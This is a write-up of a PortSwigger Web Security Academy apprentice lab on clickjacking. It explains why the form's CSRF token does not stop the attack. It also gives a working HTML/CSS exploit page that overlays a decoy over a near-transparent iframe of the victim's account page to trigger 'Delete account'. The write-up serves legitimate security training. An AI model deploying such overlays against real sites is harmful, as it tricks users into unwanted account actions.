Skip to content
Field Value
Platform PortSwigger Web Security Academy
Type Clickjacking
Difficulty Apprentice
Target 0a72006704cb27d982408dab005600d0.web-security-academy.net
Objective Trick the victim into clicking "Delete account" by overlaying a decoy button on top of it via iframe

Basic Clickjacking with CSRF Token Protection — Writeup

Initial Observation

Logged in as wiener:peter. The account page has an update email form and a delete account button. Inspecting the form:

<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
    <label>Email</label>
    <input required="" type="email" name="email" value="">
    <input required="" type="hidden" name="csrf" value="xlSG7VVbUh5a0PJfgmt6zPfgD3cMuRno">
    <button class="button" type="submit"> Update email </button>
</form>
Screenshot

There's a CSRF token on the form — but that doesn't matter for clickjacking. The attack doesn't forge a request, it tricks the user into making the real one themselves. As long as the page can be loaded in an iframe, the CSRF token is irrelevant.

Attack Path

Building the Clickjacking Page

The idea is simple: load the target account page inside a transparent iframe, then place a visible "click" element precisely on top of the delete account button. The victim thinks they're clicking the decoy, but they're actually hitting the real button underneath.

Setting the exploit server body to:

<style>
    iframe {
        width: 500px;
        height: 600px;
        opacity: xxx;
    }

    div {
        position: absolute;
        top: 500px;
        left: 40px;
    }
</style>

<div>click</div>

<iframe src="https://0a72006704cb27d982408dab005600d0.web-security-academy.net/my-account"></iframe>
Screenshot

The "click" text sits right on top of the delete account button. With opacity: 0.001 the iframe is invisible to the victim — they just see the decoy text and click it.

Screenshot

Deliver exploit to victim → account deleted → lab solved :P

Resources